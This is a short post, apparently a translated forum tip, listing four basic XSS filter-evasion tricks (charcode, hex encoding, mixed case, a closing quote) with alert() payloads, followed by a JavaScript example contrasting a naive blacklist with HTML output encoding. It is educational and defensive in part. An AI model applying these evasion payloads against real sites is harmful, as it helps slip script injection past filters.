Four super-basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3. Change the letter case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>

4. Add a closing marker ”>
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversion tool used is the HackBar Mozilla add-on for Firefox.
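As an added example that is not part of the original post: the four variants above are aimed at naive substring blacklists. The snippet below shows such a filter missing the HEX and mixed-case forms, and shows that decoding the input once and then HTML-encoding the output leaves every form inert. The sample payloads are constructed from the post's examples (the HEX one shortened to alert()), and the function names are my own.

```javascript
// Added example, not from the original post: a weak blacklist beside the
// contextual output encoding that actually stops reflected XSS.

// Constructed sample inputs: the post's original script and its four
// transformed forms. The HEX form is what the server sees before URL-decoding.
const SAMPLES = {
  plain:     "<script>alert('I love F4ck')</script>",
  ascii:     "<script>String.fromCharCode(97,108,101,114,116,40,41)</script>",
  hex:       "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%29%3c%2f%73%63%72%69%70%74%3e",
  mixedCase: "<ScRipt>AleRt('I love F4ck')</sCRipT>",
  closeAttr: '"><script>alert(\'I love F4ck\')</script>',
};

// Weak filter: case-sensitive substring match on the raw, still URL-encoded
// input. The HEX and mixed-case forms sail through it; the charcode form is
// aimed at filters keyed on the call name or on quote characters rather than
// on the tag, so this particular list still catches it.
const BLACKLIST = ["<script>", "alert("];
function naiveBlacklistBlocks(raw) {
  return BLACKLIST.some((bad) => raw.includes(bad));
}

// Correct approach: never try to recognise "bad" strings. Encode every
// character that has meaning in the HTML context the value is reflected into,
// so < > " ' & cannot open a tag or close an attribute, whatever case or
// encoding the attacker used on the way in.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeForHtml(decoded) {
  return decoded.replace(/[&<>"']/g, (c) => ENTITY[c]);
}

// Pipeline as a web app would run it: URL-decode exactly once (a malformed
// percent sequence is left as-is instead of throwing), then encode for output.
function safeReflect(raw) {
  let decoded;
  try {
    decoded = decodeURIComponent(raw);
  } catch (e) {
    decoded = raw; // URIError on bad %-sequence: fall back to the raw string
  }
  return encodeForHtml(decoded);
}

// True when the encoded output can neither open a tag nor break out of a
// double-quoted attribute value.
function isInert(encoded) {
  return !/[<>"]/.test(encoded);
}
```

Note that this only covers HTML body and attribute-value contexts; a value reflected inside a script block or a URL needs its own encoder.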